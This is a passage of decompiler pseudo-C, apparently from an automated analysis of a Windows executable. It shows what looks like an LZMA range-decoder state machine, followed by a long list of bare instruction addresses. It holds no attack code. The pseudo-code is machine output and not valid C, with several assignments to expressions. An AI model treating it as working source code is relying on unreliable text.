							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                            0x00000000
                            0x004070ab
                            0x004070ab
                            0x004070af
                            0x00407166
                            0x00407169
                            0x00407175
                            0x00407056
                            0x00407056
                            0x00407059
                            0x004073cb
                            0x004073cb
                            0x004073ce
                            0x004073ce
                            0x004073d4
                            0x004073da
                            0x004073e0
                            0x004073fa
                            0x004073fd
                            0x00407403
                            0x0040740e
                            0x00407410
                            0x004073e2
                            0x004073e2
                            0x004073f1
                            0x004073f5
                            0x004073f5
                            0x0040741a
                            0x00407441
                            0x00407441
                            0x00407447
                            0x00407447
                            0x00000000
                            0x0040741c
                            0x0040741c
                            0x00407420
                            0x004075cf
                            0x00000000
                            0x004075cf
                            0x0040742c
                            0x00407433
                            0x0040743b
                            0x0040743e
                            0x00000000
                            0x0040743e
                            0x004070b5
                            0x004070b9
                            0x004075fa
                            0x004075fa
                            0x004075fd
                            0x00407601
                            0x00407601
                            0x004070bf
                            0x004070c5
                            0x004070c8
                            0x004070cc
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x004075e5
                            0x004075ed
                            0x004075f4
                            0x004075f6
                            0x00000000
                            0x004075f6
                            0x004070d9
                            0x004070dc
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0
                            0x004070f3
                            0x004070f6
                            0x004070f7
                            0x004070f9
                            0x004070f9
                            0x004070f9
                            0x004070fc
                            0x004070ff
                            0x00407102
                            0x00407105
                            0x00407105
                            0x00407108
                            0x0040710a
                            0x0040710a
                            0x0040710d
                            0x0040710d
                            0x0040710d
                            0x00406be3
                            0x00406be3
                            0x00406bec
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x00000000
                            0x00406bfd
                            0x00000000
                            0x00000000
                            0x00406c06
                            0x00406c09
                            0x00406c0c
                            0x00406c10
                            0x00000000
                            0x00000000
                            0x00406c16
                            0x00406c19
                            0x00406c1b
                            0x00406c1c
                            0x00406c1f
                            0x00406c21
                            0x00406c22
                            0x00406c24
                            0x00406c27
                            0x00406c2c
                            0x00406c31
                            0x00406c3a
                            0x00406c4d
                            0x00406c50
                            0x00406c5c
                            0x00406c84
                            0x00406c86
                            0x00406c94
                            0x00406c94
                            0x00406c98
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406c88
                            0x00406c88
                            0x00406c8b
                            0x00406c8c
                            0x00406c8c
                            0x00000000
                            0x00406c88
                            0x00406c62
                            0x00406c67
                            0x00406c67
                            0x00406c70
                            0x00406c78
                            0x00406c7b
                            0x00000000
                            0x00406c81
                            0x00406c81
                            0x00000000
                            0x00406c81
                            0x00000000
                            0x00406c9e
                            0x00406c9e
                            0x00406ca2
                            0x0040754e
                            0x00000000
                            0x0040754e
                            0x00406cab
                            0x00406cbb
                            0x00406cbe
                            0x00406cc1
                            0x00406cc1
                            0x00406cc1
                            0x00406cc4
                            0x00406cc8
                            0x00000000
                            0x00000000
                            0x00406cca
                            0x00406cd0
                            0x00406cfa
                            0x00406d00
                            0x00406d07
                            0x00000000
                            0x00406d07
                            0x00406cd6
                            0x00406cd9
                            0x00406cde
                            0x00406cde
                            0x00406ce9
                            0x00406cf1
                            0x00406cf4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d39
                            0x00406d3f
                            0x00406d42
                            0x00406d4f
                            0x00406d57
                            0x00000000
                            0x00000000
                            0x00406d0e
                            0x00406d0e
                            0x00406d12
                            0x0040755d
                            0x00000000
                            0x0040755d
                            0x00406d1e
                            0x00406d29
                            0x00406d29
                            0x00406d29
                            0x00406d2c
                            0x00406d2f
                            0x00406d32
                            0x00406d37
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d5f
                            0x00406d61
                            0x00406d64
                            0x00406dd5
                            0x00406dd8
                            0x00406ddb
                            0x00406de2
                            0x00406dec
                            0x00000000
                            0x00406dec
                            0x00406d66
                            0x00406d6a
                            0x00406d6d
                            0x00406d6f
                            0x00406d72
                            0x00406d75
                            0x00406d77
                            0x00406d7a
                            0x00406d7c
